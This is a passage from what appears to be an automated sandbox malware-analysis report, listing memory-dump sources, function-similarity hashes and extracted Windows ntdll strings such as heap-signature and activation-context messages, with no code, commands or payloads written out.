                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: 0I8w$0I8w$0I8w$0I8w$0I8w$0I8w
                • API String ID: 3446177414-2549722193
                • Opcode ID: 8fe2fd2dec0bb53050b335e3f4d5a80c47d401e4587c984e3b314f0e8d43d98a
                • Instruction ID: 642a4c457fd3b4170088bae6e042b33bf65aa7d9a3942671c84726ff07b2fd6e
                • Opcode Fuzzy Hash: 8fe2fd2dec0bb53050b335e3f4d5a80c47d401e4587c984e3b314f0e8d43d98a
                • Instruction Fuzzy Hash: 8601D232E8C6005BF7209A2C78087873AE1B388768FC5009EEB08CF388D2244B45DB90

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 17f2890, calls subroutine at 1800050
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID:
                • API String ID: 48624451-0
                • Opcode ID: 12f1fb3187dde207b34df1c2011f0e4ab8fe05898b2a24b5367935f66e87e36b
                • Instruction ID: c80e5407fd37c4ea3255381c831aaac5b2857b3570c342a0ad276925b3f63576
                • Opcode Fuzzy Hash: 12f1fb3187dde207b34df1c2011f0e4ab8fe05898b2a24b5367935f66e87e36b
                • Instruction Fuzzy Hash: 6B51C3A6A00156AFCB15DBAC899097FFBB8BB48340B54826DF5A5E7642D334DE4087A0

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 17ca250, calls RtlDebugPrintTimes and subroutines at 17ca6e0, 183f290, 17ca840 and 17b4508
                Strings
                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 018179D5
                • RtlpFindActivationContextSection_CheckParameters, xrefs: 018179D0, 018179F5
                • SsHd, xrefs: 017CA3E4
                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 018179FA
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                • API String ID: 0-929470617
                • Opcode ID: 14447bd25f17c846db8dd02733541bb8d69dfdcfd47e2288921eeb113ffd9718
                • Instruction ID: 9b8647e401041143663c5cd49dd0dd4dd550effde6b7ff1251b513a1eeb33b49
                • Opcode Fuzzy Hash: 14447bd25f17c846db8dd02733541bb8d69dfdcfd47e2288921eeb113ffd9718
                • Instruction Fuzzy Hash: 34E1F7716043058FE725CE2CC894B2AFBE5BB84B15F144A2DF956CB291F731DA45CB81
                APIs
                Strings
                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01819346
                • RtlpFindActivationContextSection_CheckParameters, xrefs: 01819341, 01819366
                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0181936B
                • GsHd, xrefs: 017CD874
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                • API String ID: 3446177414-576511823
                • Opcode ID: 91e7214dc49cc5f06ef509308d93f3447e14619368b86e5214cee9f6b32b3d7a
                • Instruction ID: f6f9ef5a24be06a51522d5d01fc78f64d4a72f89233ab6d92b4209a15a66a9f5
                • Opcode Fuzzy Hash: 91e7214dc49cc5f06ef509308d93f3447e14619368b86e5214cee9f6b32b3d7a
                • Instruction Fuzzy Hash: 48E1A175A043428FDB24CF58C490B6AFBE5BB88718F044A7DE995DB285D770E944CB82
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                • Instruction ID: 7940fe1683dbd4291575a3d227d7bcf7927c43b364d894cd73c445cbaea726ef
                • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                • Instruction Fuzzy Hash: D5819070E452499EEF258E6CC8917FFFBB2AF85360F18415EDA61A7391C73498408BA1
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $$@
                • API String ID: 3446177414-1194432280
                • Opcode ID: 98157cd49f2e518ea78262947ba25fbe06a8c881ddcadbf713ac1ec788541d0c
                • Instruction ID: a89ee2d04035de079721fb1e00db838915c38f37c0a4f023095783030e98704e
                • Opcode Fuzzy Hash: 98157cd49f2e518ea78262947ba25fbe06a8c881ddcadbf713ac1ec788541d0c
                • Instruction Fuzzy Hash: E6811DB2D002699BDB31CB54CC45BEEB7B9AF48754F1041DAEA19B7284E7305E84DFA0
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: 0I8w$0I8w$0I8w$X
                • API String ID: 3446177414-113150377
                • Opcode ID: 2e4a1412a35e35ea7f06920e5600a3f3ce2f8c83d92dcdcb79eb59bb62b08bdd
                • Instruction ID: 840a6effc4e2d805bbf14e1d9f0f4926556c367deca4917dc9225c67ac699b7e
                • Opcode Fuzzy Hash: 2e4a1412a35e35ea7f06920e5600a3f3ce2f8c83d92dcdcb79eb59bb62b08bdd
                • Instruction Fuzzy Hash: 2E318F31D0420AFBDF22CF98D844B8FBBB1AB88754F45406DFA1596345D2789B54CF45
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                • API String ID: 3446177414-56086060
                • Opcode ID: 6302f538c8a1d0bdc25baca7a0137bba5c0185ee49a060266c4dafdac0430a91
                • Instruction ID: 80e4d0308b2747f1262ec2b65cc11659a3f7ba777955ec5f8192f7608477accb
                • Opcode Fuzzy Hash: 6302f538c8a1d0bdc25baca7a0137bba5c0185ee49a060266c4dafdac0430a91
                • Instruction Fuzzy Hash: 41418972600349DFD722EF6CC498B6AF7B8FF40328F144569E64287295CB74AA84CB81
                Strings
                • minkernel\ntdll\ldrredirect.c, xrefs: 01834899
                • LdrpCheckRedirection, xrefs: 0183488F
                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01834888
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                • API String ID: 3446177414-3154609507
                • Opcode ID: 3646ffb7671c98fcc5f86816578faffcae9bf0ef1a0b3afd88f575ab830d0a3d
                • Instruction ID: b4bf2a009dcd1f77e3b9cc0f852e68da1737b231cba86cda6289eef326c7ec02
                • Opcode Fuzzy Hash: 3646ffb7671c98fcc5f86816578faffcae9bf0ef1a0b3afd88f575ab830d0a3d
                • Instruction Fuzzy Hash: 9841EF32A146559FDB22CF2DD840A26BBE4AFC9B50B0D066DED49DB311E730EA00CBD1
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                • API String ID: 3446177414-3526935505
                • Opcode ID: 1fed95dc614ccbf5432a9425f3222b94b86a3612cc75ef8eb581fc0f8a15af4b
                • Instruction ID: e2080f6117b8dec108643d772e13d13f0b82d3c50a1867c85f9513ddeb81ff3f
                • Opcode Fuzzy Hash: 1fed95dc614ccbf5432a9425f3222b94b86a3612cc75ef8eb581fc0f8a15af4b
                • Instruction Fuzzy Hash: 4F3147311447C8DFE736EB6CC419BA6FBE8EF01B10F044498E446C7696C7B8AA84CB11
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $
                • API String ID: 3446177414-3993045852
                • Opcode ID: 9d0b9ffbaed6a7b5dae1c847017786954e312fded4a1680986c5ac750323a15e
                • Instruction ID: 47620a411aef6c706a08c6221e345b77b4069a4a8534ce5c2e1121cdc5a6a77e
                • Opcode Fuzzy Hash: 9d0b9ffbaed6a7b5dae1c847017786954e312fded4a1680986c5ac750323a15e
                • Instruction Fuzzy Hash: AB112A32904618EBDF16AF98EC486AC7B71FB44764F108219F826A72D0CB756B40CF80
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6f175ecf2228f08017fa48d6397e32616dff2e6b77d72d40cc56ac6bfae2328a
                • Instruction ID: 36c79bc2acdfd8c35573fe32adf190c9fcb5665f349823ba8c853898038725fd
                • Opcode Fuzzy Hash: 6f175ecf2228f08017fa48d6397e32616dff2e6b77d72d40cc56ac6bfae2328a
                • Instruction Fuzzy Hash: F0E12271D00608DFDB26CFA9C984AADFBF1FF48304F24456AE546A7265DB71A982CF10
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: 0359e2701c4e9904b9d936ba2dd1d555ba79c1bca268c16af0f15819bca80058
                • Instruction ID: fef1b545cde7ab65ab40912655110e535a6760a8dac9cf82bcb320c3e1715950
                • Opcode Fuzzy Hash: 0359e2701c4e9904b9d936ba2dd1d555ba79c1bca268c16af0f15819bca80058
                • Instruction Fuzzy Hash: 7B713871E00629AFDF06CFA8C884ADDBBF5BF48314F54402AEA05EB254D734AA85CF54
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: 8e9ff480cdce5dc12905652c7ed6a6cbee1e68d80e51f26fd66a2bb087387bc2
                • Instruction ID: 3db635b5df23bab39da0d4b6c4c0e0a36fd29bc5eda77d96e50ea5e107841a6a
                • Opcode Fuzzy Hash: 8e9ff480cdce5dc12905652c7ed6a6cbee1e68d80e51f26fd66a2bb087387bc2
                • Instruction Fuzzy Hash: 67512472E002299FDF0ACF98D849ADDBBB1FF49314F14812AEA15E7250D734AA85CF54
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes$BaseInitThreadThunk
                • String ID:
                • API String ID: 4281723722-0
                • Opcode ID: 45e38e10d7862b7b099e54677c847cf42e32527a0a5b90bb3dceaf7cd8fb6f9f
                • Instruction ID: a341f3c30595a66684798b3facc957a02d3b65cc6684f25ce625471cb51a775f
                • Opcode Fuzzy Hash: 45e38e10d7862b7b099e54677c847cf42e32527a0a5b90bb3dceaf7cd8fb6f9f
                • Instruction Fuzzy Hash: D0312775E00629AFDF22DFA8D844AADBBF0BB48720F24412AE512F7294D7345E40CF64
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 2397490a1379acb7c4ef53b322dbb9af34e3b1f18339eec1a2156d57138aa008
                • Instruction ID: c3ae743da83299f093d3ae4716b8e81c0e4bafb019bf21dea4b0f516f3503cb7
                • Opcode Fuzzy Hash: 2397490a1379acb7c4ef53b322dbb9af34e3b1f18339eec1a2156d57138aa008
                • Instruction Fuzzy Hash: 04324871D0426ADFDB26DF68C884BEDFBB5BB18304F0081E9E549A7241D7749A84CF91
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                • Instruction ID: 562715d85ac5699b53b40035b55df5ad4c5fda1ab5b675ac0e85313eb4dcae7a
                • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                • Instruction Fuzzy Hash: D5919171E0020A9AEB28DF6DC881ABFFBE5AF44320F54461EEB65E73C4D73099428751
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: Bl$l
                • API String ID: 3446177414-208461968
                • Opcode ID: a6b0afd25b13d9a80e9b9b1248db970b76cd7aec3148608e4a8d0e1488e95d05
                • Instruction ID: 6eba8fbbe5d1d1aef72d96d496ea4cf7b7acc10f49e728c737ab6e102f8a1ebf
                • Opcode Fuzzy Hash: a6b0afd25b13d9a80e9b9b1248db970b76cd7aec3148608e4a8d0e1488e95d05
                • Instruction Fuzzy Hash: E0A1C531A00319DBEB31DB98C894BAAF7B5BB44B04F0540FDD909A7245DB74AE85CF91
                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 017F5E34
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: eefde04eeb2ee4b7bde99f48d26f99f867ec1b14e21a12342dfef7bdf5a4474d
